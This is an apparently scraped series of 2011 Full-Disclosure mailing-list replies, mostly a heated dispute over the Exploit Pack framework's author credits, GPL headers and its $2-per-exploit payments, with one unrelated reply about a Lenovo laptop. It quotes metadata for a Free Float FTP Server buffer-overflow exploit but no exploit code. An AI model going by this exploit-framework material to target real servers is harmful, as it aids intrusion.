sponsored by Secunia - http://secunia.com/ > > > > > > -- > Ferenc Kovács > @Tyr43l - http://tyrael.hu > ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] New open source Security Framework
Dont be angry about it, but, you could atleast give credit to those, your paying a whole 2$ to, or even if NOT paid, you should leave AUTHOR name INSIDE the exploit, maybe thats why it is being molested ? GPL is fine, but, you are seen as a bad dude, simply coz you dont give simple credit, and rather, add a patch for the thing to remove the autho, i mean, why not allow let ppl atleast see authors nickname/name.. it is not nice to those who put in theyre time, to help YOUR project, for whatever reasons, and, i love github, and, this has nothing todo with github, but, i am saying, you should never rename stuff, just take a look at 1337day.com, or , is that yours also ;p have a lovely day, i will look at the project, if i think it is decent, i would even buy, a pirated version... etc...etc... you know how it is, one copys out, 100 copies is really outtt ;) its all good bro, keep up the good work, just leave authors names maybe, remove email is fine, but you shuld leave author name, so ppl know maybe, wich things will be better/more reliable code, or stabler code, perhaps, than other authors... or, is that wrong to assume... i sure, would not like to see some code i have wrote, on there, without atleast saying #Thanks to xd for this one. it is one line dude. take it easy, dont flame up. xd On 6 October 2011 09:04, Juan Sacco wrote: > As you might know, or not know, Exploit Pack is working without any > foundation, company, governement and money-giving guy. > There is no professionnal coder, programmer that is paid to develop this > program. > > I have tried to ensure that the name of the exploit author is seen in all > the software.It was my bad pasting the license there, but hey! Im human give > me a break you troll. > > The next time would be better if you post it in the right place, GitHub. > > And in fact youre trying to blame here. > > Exploit Pack is licensed GPL let me copy & paste the 4 freedoms. I hope to > do it well this time. > > The freedom to run the program, for any purpose (freedom 0). > The freedom to study how the program works, and change it so it does your > computing as you wish (freedom 1). Access to the source code is a > precondition for this. > The freedom to redistribute copies so you can help your neighbor (freedom > 2). > The freedom to distribute copies of your modified versions to others > (freedom 3). By doing this you can give the whole community a chance to > benefit from your changes. Access to the source code is a precondition for > this. > > Let me ask you why you are spending so much time annoying this GPL > software? > > I hope next time get a patch of code from you and no nonsense again. > > Like I said to lroot. The same goes for YOU. If you want the right to > demand certain things from the program, then go BUY a program and do not > harass people who are writing software for free, or go and help the > developers by writing the functionality yourself. > > Juan Sacco > > On Wed, Oct 5, 2011 at 6:36 PM, xD 0x41 wrote: > >> wow i was not going to comment on that pack and have not yet looked but, >> thats plain nasty... to remove a simple credit line, i mean it is not full >> of greetz etc :s and replace... totally pathetic. >> >> >> >> On 5 October 2011 20:32, root wrote: >> >>> - * @author Stefan Zeiger (szei...@novocode.com) >>> - print " Written by Blake " >>> - >>> >>> +#Exploit Pack - Security Framework for Exploit Developers >>> +#Copyright 2011 Juan Sacco http://exploitpack.com >>> +# >>> +#This program is free software: you can redistribute it and/or modify >>> it under the terms of the >>> +#GNU General Public License as published by the Free Software >>> Foundation, either version 3 >>> +#or any later version. >>> +# >>> +#This program is distributed in the hope that it will be useful, but >>> WITHOUT ANY WARRANTY; >>> +#without even the implied warranty of MERCHANTABILITY or FITNESS FOR A >>> PARTICULAR >>> +#PURPOSE. See the GNU General Public License for more details. >>> +# >>> +#You should have received a copy of the GNU General Public License >>> along with this program. >>> +#If not, see http://www.gnu.org/licenses/ >>> >>> >>> >>> Ys why not? >>> >>> ___ >>> Full-Disclosure - We believe in it. >>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >>> Hosted and sponsored by Secunia - http://secunia.com/ >>> >> >> >> ___ >> Full-Disclosure - We believe in it. >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >> Hosted and sponsored by Secunia - http://secunia.com/ > > ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] New open source Security Framework
Heya jeff, The author is clearly not smart. He is copying other codes, this is a plain rip off of canvas...hehe... and same with his insect pro... he stole metasplit for tht one, then he wants repect, when we see him removing simplly one line wich would atleast say a ty and, show [ppl who writes, is maybe sometimes stabler than other authors, it would be better to have this in, not out.. he should be able to see thats how it works with exploit code/pocs in general... sometimes, if i see php code from one person, i will tend to look, but if it was from an unknown person, i prolly wouldnt. But this (open sauce) project, i will download and waste 5minutes on. Then illm go back to Backbox and BT5 and things wich work :) hehe (this guy is really mad about his app... and i mean, dang mad angry! I will buy some tissues and send to him, that is my donation for his app) :)) xd On 6 October 2011 08:59, Jeffrey Walton wrote: > On Wed, Oct 5, 2011 at 5:32 AM, root wrote: > > - * @author Stefan Zeiger (szei...@novocode.com) > > - print " Written by Blake " > > - > > > > +#Exploit Pack - Security Framework for Exploit Developers > > +#Copyright 2011 Juan Sacco http://exploitpack.com > > +# > > +#This program is free software: you can redistribute it and/or modify > > it under the terms of the > > +#GNU General Public License as published by the Free Software > > Foundation, either version 3 > > +#or any later version. > > +# > > +#This program is distributed in the hope that it will be useful, but > > WITHOUT ANY WARRANTY; > > +#without even the implied warranty of MERCHANTABILITY or FITNESS FOR A > > PARTICULAR > > +#PURPOSE. See the GNU General Public License for more details. > > +# > > +#You should have received a copy of the GNU General Public License > > along with this program. > > +#If not, see http://www.gnu.org/licenses/ > GPL V3 - they had to encumber it to set it free? > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] New open source Security Framework
i know eh, coders dream :P Iits only 2bux per sploit you add.. so even from PoC code, to scanner, wow! Thats a bargain, a day code per scanner, unfortunately tho this is good money for some countrys, and people, and thats who the targets are for this.. lower level skilled coders... nasty . On 6 October 2011 10:15, root wrote: > On 10/05/2011 06:39 PM, xD 0x41 wrote: > > You will inmediately recieve $2 (US Dollars) in your PayPal account for > > each approved exploit. > > > > > > This is IT dream, 2bux for one 0day or, 100 = 200bux :P > > I have verified your calculations. > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Full-Disclosure - sick of your nonsense
Starting fights... because i dislike one product, and question ITsec... is hardly what your trying to make me out to be. Think, and do as you like. cheers. xd On 6 October 2011 10:31, Sam Goody wrote: > Dude, I think many people including myself are sick of your > nonsense on top of trying to provoke fights on full-disc. > > This list is not for chatting and 90% of what you've written is > subpar. > > Please keep the nonsense to yourself. You will now be added to the > n3td3v e-mail black list. > > Cheers! > > ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] New open source Security Framework
Juan, I have not created any opinion (yet) but, is it rally fair, to give people who code, 2 frigging dollars, for sometimes what would be 0day , or is it nice, to remove the REAL auithors name, and add your own. Thats the only grips i see, without having to look at it yet. The whole look of it, without 'using' it tho, looks alot like canvas ;p but, thats not bad thing and, i personally, dont mind that, coz canvas, is not open and, this one is, wich would be great to bring that feel into it.. so, your reading tomuch into things, when i mean giving credit to author, i dont mean putting in his email/greetings and notes, i mean, simply one line to give credit, so people who are using the pack, could atleastfeel sure with some coders,that the code will be very nice, and not painful to read or , modify even to make it nicer.. that is why i like to always makesure authors get some credit, however it may be, it only needbe a nick/name, but you are using theyre things, but on your people who your paying, i guess you should maybe put in place then rules that, all exploits paid for, would not recieve credits, other than, part of devteam or part of exploit-pack codepack. It aint hard to keep people happy. Whilst still producing quality, or, non quality. i will run your pack, using ONE well know exploit, and if that fails, i will have results here, compared to backbox scan or, another vuln scan, then, i will comment further. How does that sound? Ok. I will do my research, but, i aint angry at you, nor the product, altho i dislike Insect, this one, seems to have some good features. So yea, ill take an open look, i only think, if code is NOT paid for, then you should put authors name or handle in there somwhere, maybe even something for paid exploits... people do appreciate a 'thanks to' sometimes... especially you it seems. xd On 6 October 2011 10:47, Juan Sacco wrote: > Hey, > Its really a shame that you didn't even take like 2 minutes to watch the > source code of Exploit Pack before create an opinion. > This can't be a copy of CANVAS. Canvas is made on Python. Exploit Pack > JAVA. See the diference? Also, please take a look at the interface design, > both are really different. Show me where Exploit Pack is similar to Canvas! > I think you spent too much time looking for Waldo :-D > > We respect the exploit author and that is why I add them at the first line > of the XML file > You should run the program before creating this crappy post with your > nonsense opinions ( Harassing the free work of others, you wrote lke 5 - 6 > insulting posts in like.. 2 minutes?.. Dude go find a girl, come on ) > > Take a look if you want: > > > > > Platform="windows" Service="ftp" Type="remote" RemotePort="21" LocalPort="" > ShellcodeAvailable="R" ShellPort="" SpecialArgs=""> > > > > Free Float FTP Server USER Command Remote Buffer Overflow Exploit > when parsing the command 'USR', which leads to a stack based overflow. Also > Free Float FTP Server allow remote anonymous login by default > exploiting these issues could allow an attacker to compromise the > application, access or modify data. > > > JSacco > > On Wed, Oct 5, 2011 at 8:16 PM, xD 0x41 wrote: > >> Heya jeff, >> The author is clearly not smart. >> He is copying other codes, this is a plain rip off of canvas...hehe... and >> same with his insect pro... he stole metasplit for tht one, then he wants >> repect, when we see him removing simplly one line wich would atleast say a >> ty and, show [ppl who writes, is maybe sometimes stabler than other authors, >> it would be better to have this in, not out.. he should be able to see thats >> how it works with exploit code/pocs in general... sometimes, if i see php >> code from one person, i will tend to look, but if it was from an unknown >> person, i prolly wouldnt. >> But this (open sauce) project, i will download and waste 5minutes on. >> Then illm go back to Backbox and BT5 and things wich work :) >> hehe >> (this guy is really mad about his app... and i mean, dang mad angry! I >> will buy some tissues and send to him, that is my donation for his app) >> :)) >> xd >> >> >> On 6 October 2011 08:59, Jeffrey Walton wrote: >> >>> On Wed, Oct 5, 2011 at 5:32 AM, root wrote: >>> > - * @author Stefan Zeiger (szei...@novocode.com) >>> > - print " Written by Blake " >>> > - >> Vulnerability="N/A"> >>> > >>> > +#Exploit Pack - Security Framework for Exploit Developers >>> > +#Copyright 2011 Juan Sacco http://exploitpack.com >>> > +# >>>
Re: [Full-disclosure] New open source Security Framework
Free Float FTP Server USER Command Remote Buffer Overflow Exploit when parsing the command 'USR', which leads to a stack based overflow. Also Free Float FTP Server allow remote anonymous login by default exploiting these issues could allow an attacker to compromise the application, access or modify data. erm, sorry this dont count, it should be IN the code, not, after running it :P thats bs mate, and i wont agree with your crap, until you see my point really. It is, something you write, compared to running thwe GUI.. xd On 6 October 2011 10:47, Juan Sacco wrote: > Hey, > Its really a shame that you didn't even take like 2 minutes to watch the > source code of Exploit Pack before create an opinion. > This can't be a copy of CANVAS. Canvas is made on Python. Exploit Pack > JAVA. See the diference? Also, please take a look at the interface design, > both are really different. Show me where Exploit Pack is similar to Canvas! > I think you spent too much time looking for Waldo :-D > > We respect the exploit author and that is why I add them at the first line > of the XML file > You should run the program before creating this crappy post with your > nonsense opinions ( Harassing the free work of others, you wrote lke 5 - 6 > insulting posts in like.. 2 minutes?.. Dude go find a girl, come on ) > > Take a look if you want: > > > > > Platform="windows" Service="ftp" Type="remote" RemotePort="21" LocalPort="" > ShellcodeAvailable="R" ShellPort="" SpecialArgs=""> > > > > Free Float FTP Server USER Command Remote Buffer Overflow Exploit > when parsing the command 'USR', which leads to a stack based overflow. Also > Free Float FTP Server allow remote anonymous login by default > exploiting these issues could allow an attacker to compromise the > application, access or modify data. > > > JSacco > > On Wed, Oct 5, 2011 at 8:16 PM, xD 0x41 wrote: > >> Heya jeff, >> The author is clearly not smart. >> He is copying other codes, this is a plain rip off of canvas...hehe... and >> same with his insect pro... he stole metasplit for tht one, then he wants >> repect, when we see him removing simplly one line wich would atleast say a >> ty and, show [ppl who writes, is maybe sometimes stabler than other authors, >> it would be better to have this in, not out.. he should be able to see thats >> how it works with exploit code/pocs in general... sometimes, if i see php >> code from one person, i will tend to look, but if it was from an unknown >> person, i prolly wouldnt. >> But this (open sauce) project, i will download and waste 5minutes on. >> Then illm go back to Backbox and BT5 and things wich work :) >> hehe >> (this guy is really mad about his app... and i mean, dang mad angry! I >> will buy some tissues and send to him, that is my donation for his app) >> :)) >> xd >> >> >> On 6 October 2011 08:59, Jeffrey Walton wrote: >> >>> On Wed, Oct 5, 2011 at 5:32 AM, root wrote: >>> > - * @author Stefan Zeiger (szei...@novocode.com) >>> > - print " Written by Blake " >>> > - >> Vulnerability="N/A"> >>> > >>> > +#Exploit Pack - Security Framework for Exploit Developers >>> > +#Copyright 2011 Juan Sacco http://exploitpack.com >>> > +# >>> > +#This program is free software: you can redistribute it and/or modify >>> > it under the terms of the >>> > +#GNU General Public License as published by the Free Software >>> > Foundation, either version 3 >>> > +#or any later version. >>> > +# >>> > +#This program is distributed in the hope that it will be useful, but >>> > WITHOUT ANY WARRANTY; >>> > +#without even the implied warranty of MERCHANTABILITY or FITNESS FOR A >>> > PARTICULAR >>> > +#PURPOSE. See the GNU General Public License for more details. >>> > +# >>> > +#You should have received a copy of the GNU General Public License >>> > along with this program. >>> > +#If not, see http://www.gnu.org/licenses/ >>> GPL V3 - they had to encumber it to set it free? >>> >>> ___ >>> Full-Disclosure - We believe in it. >>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >>> Hosted and sponsored by Secunia - http://secunia.com/ >>> >> >> >> ___ >> Full-Disclosure - We believe in it. >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >> Hosted and sponsored by Secunia - http://secunia.com/ >> > > > > -- > _ > Insecurity Research - Security auditing and testing software > Web: http://www.insecurityresearch.com > Insect Pro 2.5 was released stay tunned > > > ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Strange Lenovo x121e
Hrm this one is tricky, but smells so bad of preuse, specially when you said this; * Inside seal on plastic bag also intact, but glue is suboptimal, I opened the bag without damaging the seal Thats a clear sign of tamperage...thats when they tell you "do not buy" ... so i wonder :s I know it could be any -THINK pad/box, but i also know that Lenovo did buy IBM boxes, wich still bore the seal of IBM and IBM hardware,then i believe when Lenovo started pumping these out (in have about 6 of the P4 dual-cpu ex-demos here), i saw on a complete wipe i did, nothing, no files left, and these are actually lenovos, disguised as Ibm, or, so it should be according to the dates.. IBM name must be able to be used also on lenovo products, i just wiped 4 IBM wich were only one yr old, and they seem clean :s, so, i went thru fdisk etc, nothing weird... Is it perhaps something being leftover, from some badly warezd ISO Windows install...wich can lay dormant, even after a format but, not after fdisk usually... strange, i cannot figure this one. It smells of pre-use, or ex-demo, but, i have got, 3 ibm netvista 2cpu boxes,1 3.3gig awesome IBM thinkcentre,fastest box i have as in loading/swap access,and IBM Blade,IBM laptop, and not one has those files...i even paid for ex-demo on the laptop, and it was installed... i can only see *no* good reason for .exe to be on the drive, after a sale. It should have always been wiped/fdisk/shredded, as I know i have had done withthe ex demos i have here, and, they are part lenovo and part IBM and still, not one of those files exits on any box, and the laptop wich, i thought would forsure have something, if any of them did... but nope. I dont know this one, but, i will try and ask a friend who works with IBM and see theyre practices, and try get his own quotes. Anyhow, cheers. xd On 6 October 2011 10:49, halfdog wrote: > -BEGIN PGP SIGNED MESSAGE- > Hash: SHA1 > > xD 0x41 wrote: > > Looks like a pre used box... specially with that name, am assuming > > THINK (thinkcentre/thinkpad - ibm) so in there it might be preused > > IBM/Lenovo, but strange those files..should never be on the hd on a > > clean sale. > > Pre-use is strange: > * Cardbox says: manufactured 2011-08-04 > * Cardbox seems authentic (YUEN FOONG YU PAPER SHANGHAI PLANT CO., LTD.) > * Thinkpad sticky plastic tape could not be removed without cardbox > surface damage, was not damaged before opening > * Inside seal on plastic bag also intact, but glue is suboptimal, I > opened the bag without damaging the seal > * Bought in Austria 2011-09-23, seems that those machines were already > on stock for some days. > > So 50 days with shipping (15000km oversea?) seems quite narrow for > pre-use, but one can never known ... > > Also nice: Power on hours: 15 (now its 1:20, I started 18:30, so I > should have caused about 7h power-on time). How long would factory > equipment take to put 320GB image on SATA? > > hd > > - -- > http://www.halfdog.net/ > PGP: 156A AE98 B91F 0114 FE88 2BD8 C459 9386 feed a bee > -BEGIN PGP SIGNATURE- > Version: GnuPG v1.4.6 (GNU/Linux) > > iD8DBQFOjOz0xFmThv7tq+4RAqyaAKCFXDwhdMI/d30rfC+S6LF+gM8rewCfQ78+ > izSYcM/+I1yGiMsZOzwpli8= > =HeZg > -END PGP SIGNATURE- > ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] New open source Security Framework
Juan, why lie dude, i looked at your github LATEST pull/commit, what is this then Exploit Pack/exploits/Free Float FTP Server - copia.xml - View file @ e17cc4d<https://github.com/exploitpack/trunk/blob/e17cc4d5ee893ce93d2e56deccd7595e944210ee/Exploit%20Pack/exploits/Free%20Float%20FTP%20Server%20-%20copia.xml> @@ -1,17 +0,0 @@ - - - - - - - -Free Float FTP Server USER Command Remote Buffer Overflow Exploit -when parsing the command 'USR', which leads to a stack based overflow. Also Free Float FTP Server allow remote anonymous login by default -exploiting these issues could allow an attacker to compromise the application, access or modify data. - - - -Microsoft Windows XP SP2 - Microsoft Windows XP SP3 - - - exposed! and it is rubbish. 5 exploits, i even pointed him, (in pvt) to a million py files he can now deface... and he acting like, hes all for the author being in the sploit..right..ye.. and nice use of xml ... this is worse thing, i have seen, i have seen better made bash exploit packs. sorry, again your stuff is a complete fail. not even the main exploits, who the heck cares about ftpds like, 10 students use.. you are maybe in need of guidance, wich, i doubt anyone will give after these lies your pulling... telling ppl, your doing the RIGHT thing, when your git pull says different! i alsio have a giot hub, and understanmd how it works,. so stop trying to stooge people dude, your stuff sux. and when i tried to seperate links, into different downloads, like your download page specifies.. it does not work and always gives the base, wich is linux. only. i believe...unless osme, small tweaking/batfile made for win32..but, you advertise the win32 binarys..so, your just fake. pls explain..why your acting like, i am a liar, when, your removing the author, from even the exploits now... cheeky,and very rude to me personally. screw u and ur pathetic crap, open or closed,it is a waste of time. xd On 6 October 2011 10:47, Juan Sacco wrote: > Hey, > Its really a shame that you didn't even take like 2 minutes to watch the > source code of Exploit Pack before create an opinion. > This can't be a copy of CANVAS. Canvas is made on Python. Exploit Pack > JAVA. See the diference? Also, please take a look at the interface design, > both are really different. Show me where Exploit Pack is similar to Canvas! > I think you spent too much time looking for Waldo :-D > > We respect the exploit author and that is why I add them at the first line > of the XML file > You should run the program before creating this crappy post with your > nonsense opinions ( Harassing the free work of others, you wrote lke 5 - 6 > insulting posts in like.. 2 minutes?.. Dude go find a girl, come on ) > > Take a look if you want: > > > > > Platform="windows" Service="ftp" Type="remote" RemotePort="21" LocalPort="" > ShellcodeAvailable="R" ShellPort="" SpecialArgs=""> > > > > Free Float FTP Server USER Command Remote Buffer Overflow Exploit > when parsing the command 'USR', which leads to a stack based overflow. Also > Free Float FTP Server allow remote anonymous login by default > exploiting these issues could allow an attacker to compromise the > application, access or modify data. > > > JSacco > > On Wed, Oct 5, 2011 at 8:16 PM, xD 0x41 wrote: > >> Heya jeff, >> The author is clearly not smart. >> He is copying other codes, this is a plain rip off of canvas...hehe... and >> same with his insect pro... he stole metasplit for tht one, then he wants >> repect, when we see him removing simplly one line wich would atleast say a >> ty and, show [ppl who writes, is maybe sometimes stabler than other authors, >> it would be better to have this in, not out.. he should be able to see thats >> how it works with exploit code/pocs in general... sometimes, if i see php >> code from one person, i will tend to look, but if it was from an unknown >> person, i prolly wouldnt. >> But this (open sauce) project, i will download and waste 5minutes on. >> Then illm go back to Backbox and BT5 and things wich work :) >> hehe >> (this guy is really mad about his app... and i mean, dang mad angry! I >> will buy some tissues and send to him, that is my donation for his app) >> :)) >> xd >> >> >> On 6 October 2011 08:59, Jeffrey Walton wrote: >> >>> On Wed, Oct 5, 2011 at 5:32 AM, root wrote: >>> > - * @author Stefan Zeiger (szei...@novocode.com) >>> > - print " Written by Blake " >>> > - >> Vulnerability="N/A"> >>> > >>> > +#Exploit Pack - Secur
Re: [Full-disclosure] New open source Security Framework
as i said again stop the lies.' Take a look if you want: Free Float FTP Server USER Command Remote Buffer Overflow Exploit when parsing the command 'USR', which leads to a stack based overflow. Also Free Float FTP Server allow remote anonymous login by default exploiting these issues could allow an attacker to compromise the application, access or modify data. JSacco I did, and i also looked at hyour git src to. screw u and the pack,. until it is pro, i wont b near it, and, it wont EVER b pro, with YOU runnin it,. who will give u GOOD stuff, for 2bux.. fool. and you dare lie, anyone can check what i just saw, and, thats him, plain out lying about his stuff, instead of just, admitting, "ok well, it is new, and, could be, fixed alittle..any siggestions are welcome..." as, i did give him already one in PM... but now, pfft. stop ccing me pls. xd On 6 October 2011 11:16, Juan Sacco wrote: > Hey.. I already gave you an answer about this. > > AGAIN. For the last time. > I respect the author's name of all the exploits added to Exploit Pack, like > you suggest in a terrible and way.. Insulting and posting like 10 mail to > the this list. I will add a " # Thank you [AUTHOR NAME ] for let us use your > public script " in the top of all new exploit added to Exploit Pack > Framework. > > ** Also, I created a mailing list to discuss this kind of things, report > bugs and much more ( But sorry, NO INSULTING is allowed there ) ** > > As other people told you stop doing chatting here. This is not a forum. > > JSacco > > On Wed, Oct 5, 2011 at 8:57 PM, xD 0x41 wrote: > >> >> Free Float FTP Server USER Command Remote Buffer Overflow Exploit >> when parsing the command 'USR', which leads to a stack based overflow. Also >> Free Float FTP Server allow remote anonymous login by default >> exploiting these issues could allow an attacker to compromise the >> application, access or modify data. >> >> >> >> erm, sorry this dont count, it should be IN the code, not, after running it >> :P >> thats bs mate, and i wont agree with your crap, until you see my point >> really. It is, something you write, compared to running thwe GUI.. >> >> >> xd >> >> >> >> On 6 October 2011 10:47, Juan Sacco wrote: >> >>> Hey, >>> Its really a shame that you didn't even take like 2 minutes to watch the >>> source code of Exploit Pack before create an opinion. >>> This can't be a copy of CANVAS. Canvas is made on Python. Exploit Pack >>> JAVA. See the diference? Also, please take a look at the interface design, >>> both are really different. Show me where Exploit Pack is similar to Canvas! >>> I think you spent too much time looking for Waldo :-D >>> >>> We respect the exploit author and that is why I add them at the first >>> line of the XML file >>> You should run the program before creating this crappy post with your >>> nonsense opinions ( Harassing the free work of others, you wrote lke 5 - 6 >>> insulting posts in like.. 2 minutes?.. Dude go find a girl, come on ) >>> >>> Take a look if you want: >>> >>> >>> >>> >>> >> Platform="windows" Service="ftp" Type="remote" RemotePort="21" LocalPort="" >>> ShellcodeAvailable="R" ShellPort="" SpecialArgs=""> >>> >>> >>> >>> Free Float FTP Server USER Command Remote Buffer Overflow Exploit >>> when parsing the command 'USR', which leads to a stack based overflow. Also >>> Free Float FTP Server allow remote anonymous login by default >>> exploiting these issues could allow an attacker to compromise the >>> application, access or modify data. >>> >>> >>> JSacco >>> >>> On Wed, Oct 5, 2011 at 8:16 PM, xD 0x41 wrote: >>> >>>> Heya jeff, >>>> The author is clearly not smart. >>>> He is copying other codes, this is a plain rip off of canvas...hehe... >>>> and same with his insect pro... he stole metasplit for tht one, then he >>>> wants repect, when we see him removing simplly one line wich would atleast >>>> say a ty and, show [ppl who writes, is maybe sometimes stabler than other >>>> authors, it would be better to have this in, not out.. he should be able to >>>> see thats how it works with exploit code/pocs in general... sometimes, if i >>>> see php code from one person, i will tend to look, but if it was from an >>&
Re: [Full-disclosure] New open source Security Framework
OK, now that is out of way, i would be very happy to help, and contribute even, and will join that list, i dont have address offhand, but i will look for it if i have to,...and, i will suggest things there, and, i am not nasty, I just, respect authors. I appreciate this change..and, i understand, the project, is still young. AGAIN. For the last time. I respect the author's name of all the exploits added to Exploit Pack, like you suggest in a terrible and way.. Insulting and posting like 10 mail to the this list. I will add a " # Thank you [AUTHOR NAME ] for let us use your public script " in the top of all new exploit added to Exploit Pack Framework. I thankyou for this, and this would be nice if it was somehow, incorporated into the exploit-name,but, i understand this is harder..but some coders, theyre work is always amazing, those guys, would definately deserve it.. but, thats totally something, i will leave to you. i will even try and, assist the project when i have time, since you are also trying to work with things. I want this clear, there is no spite/hate here, it is simply new, and needs like all new things, debugging alittle :) it is, good start. xd On 6 October 2011 11:16, Juan Sacco wrote: > Hey.. I already gave you an answer about this. > > AGAIN. For the last time. > I respect the author's name of all the exploits added to Exploit Pack, like > you suggest in a terrible and way.. Insulting and posting like 10 mail to > the this list. I will add a " # Thank you [AUTHOR NAME ] for let us use your > public script " in the top of all new exploit added to Exploit Pack > Framework. > > ** Also, I created a mailing list to discuss this kind of things, report > bugs and much more ( But sorry, NO INSULTING is allowed there ) ** > > As other people told you stop doing chatting here. This is not a forum. > > JSacco > > On Wed, Oct 5, 2011 at 8:57 PM, xD 0x41 wrote: > >> >> Free Float FTP Server USER Command Remote Buffer Overflow Exploit >> when parsing the command 'USR', which leads to a stack based overflow. Also >> Free Float FTP Server allow remote anonymous login by default >> exploiting these issues could allow an attacker to compromise the >> application, access or modify data. >> >> >> >> erm, sorry this dont count, it should be IN the code, not, after running it >> :P >> thats bs mate, and i wont agree with your crap, until you see my point >> really. It is, something you write, compared to running thwe GUI.. >> >> >> xd >> >> >> >> On 6 October 2011 10:47, Juan Sacco wrote: >> >>> Hey, >>> Its really a shame that you didn't even take like 2 minutes to watch the >>> source code of Exploit Pack before create an opinion. >>> This can't be a copy of CANVAS. Canvas is made on Python. Exploit Pack >>> JAVA. See the diference? Also, please take a look at the interface design, >>> both are really different. Show me where Exploit Pack is similar to Canvas! >>> I think you spent too much time looking for Waldo :-D >>> >>> We respect the exploit author and that is why I add them at the first >>> line of the XML file >>> You should run the program before creating this crappy post with your >>> nonsense opinions ( Harassing the free work of others, you wrote lke 5 - 6 >>> insulting posts in like.. 2 minutes?.. Dude go find a girl, come on ) >>> >>> Take a look if you want: >>> >>> >>> >>> >>> >> Platform="windows" Service="ftp" Type="remote" RemotePort="21" LocalPort="" >>> ShellcodeAvailable="R" ShellPort="" SpecialArgs=""> >>> >>> >>> >>> Free Float FTP Server USER Command Remote Buffer Overflow Exploit >>> when parsing the command 'USR', which leads to a stack based overflow. Also >>> Free Float FTP Server allow remote anonymous login by default >>> exploiting these issues could allow an attacker to compromise the >>> application, access or modify data. >>> >>> >>> JSacco >>> >>> On Wed, Oct 5, 2011 at 8:16 PM, xD 0x41 wrote: >>> >>>> Heya jeff, >>>> The author is clearly not smart. >>>> He is copying other codes, this is a plain rip off of canvas...hehe... >>>> and same with his insect pro... he stole metasplit for tht one, then he >>>> wants repect, when we see him removing simplly one line wich would atleast >>>> say a ty and, show [ppl who writes, is maybe sometimes s
Re: [Full-disclosure] New open source Security Framework
Yes, i will join. http://exploitpack.com/mailing-list i will try and contribute actually.. i see now why you removed abit of the author name but... kinda handy to know it is always same author to ;p but, we will discuss this on that list :) i will look forward to trying to make it, abit nicer ... specially, could get some friendly help, wich would be nice.. thats what it needs, some deent codes..to be really looked at, and used, then, you would want to get it added to like BT or BackBox etc...so, i can try help , sure :) Im glad you offered that ,.hehe. cheers, xd On 6 October 2011 11:23, Juan Sacco wrote: > Hey, Wanna Join? and contribute to a with a GPL Project? Welcome aboard!!! > ( Please do me a favor and read the license first ) > > Wanna keep talking about your personal opinion? > > Please.. As it was told stop doing it here, this is not a chatroom. We have > a forum and a mailing list for that. > > It would be nice to see you there... Believe me. > > I invite you all to the new forum! :-) > http://exploitpack.com > > Cheers! > > > On Wed, Oct 5, 2011 at 8:55 PM, xD 0x41 wrote: > >> Juan, >> I have not created any opinion (yet) but, is it rally fair, to give people >> who code, 2 frigging dollars, for sometimes what would be 0day , or is it >> nice, to remove the REAL auithors name, and add your own. >> Thats the only grips i see, without having to look at it yet. >> The whole look of it, without 'using' it tho, looks alot like canvas ;p >> but, thats not bad thing and, i personally, dont mind that, coz canvas, is >> not open and, this one is, wich would be great to bring that feel into it.. >> so, your reading tomuch into things, when i mean giving credit to author, i >> dont mean putting in his email/greetings and notes, i mean, simply one line >> to give credit, so people who are using the pack, could atleastfeel sure >> with some coders,that the code will be very nice, and not painful to read or >> , modify even to make it nicer.. that is why i like to always makesure >> authors get some credit, however it may be, it only needbe a nick/name, but >> you are using theyre things, but on your people who your paying, i guess you >> should maybe put in place then rules that, all exploits paid for, would not >> recieve credits, other than, part of devteam or part of exploit-pack >> codepack. >> It aint hard to keep people happy. Whilst still producing quality, or, non >> quality. >> i will run your pack, using ONE well know exploit, and if that fails, i >> will have results here, compared to backbox scan or, another vuln scan, >> then, i will comment further. How does that sound? >> Ok. I will do my research, but, i aint angry at you, nor the product, >> altho i dislike Insect, this one, seems to have some good features. So yea, >> ill take an open look, i only think, if code is NOT paid for, then you >> should put authors name or handle in there somwhere, maybe even something >> for paid exploits... people do appreciate a 'thanks to' sometimes... >> especially you it seems. >> xd >> >> >> On 6 October 2011 10:47, Juan Sacco wrote: >> >>> Hey, >>> Its really a shame that you didn't even take like 2 minutes to watch the >>> source code of Exploit Pack before create an opinion. >>> This can't be a copy of CANVAS. Canvas is made on Python. Exploit Pack >>> JAVA. See the diference? Also, please take a look at the interface design, >>> both are really different. Show me where Exploit Pack is similar to Canvas! >>> I think you spent too much time looking for Waldo :-D >>> >>> We respect the exploit author and that is why I add them at the first >>> line of the XML file >>> You should run the program before creating this crappy post with your >>> nonsense opinions ( Harassing the free work of others, you wrote lke 5 - 6 >>> insulting posts in like.. 2 minutes?.. Dude go find a girl, come on ) >>> >>> Take a look if you want: >>> >>> >>> >>> >>> >> Platform="windows" Service="ftp" Type="remote" RemotePort="21" LocalPort="" >>> ShellcodeAvailable="R" ShellPort="" SpecialArgs=""> >>> >>> >>> >>> Free Float FTP Server USER Command Remote Buffer Overflow Exploit >>> when parsing the command 'USR', which leads to a stack based overflow. Also >>> Free Float FTP Server allow remote anonymous login by default >>> exploiting these issues could allow an attacker to compr
